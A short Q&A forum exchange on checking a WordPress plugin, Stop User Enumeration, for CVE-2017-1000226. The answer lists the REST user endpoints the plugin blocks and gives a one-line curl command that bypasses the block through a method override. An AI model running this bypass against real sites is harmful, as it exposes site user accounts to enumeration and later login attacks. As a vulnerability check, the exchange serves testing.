0 votes
How can to check the plugin is vulnerable CVE-2017-1000226 or not?
by (147 points)

1 Answer

0 votes

Stop User Enumeration blocks 

/wp-json/wp/v2/users  

/?rest_route=/wp/v2/users

But Stop User Enumeration <= 1.3.8 vulnerable and easily bypassable 

curl http://localhost/?_method=GET -d rest_route=/wp/v2/users

by (188 points)
...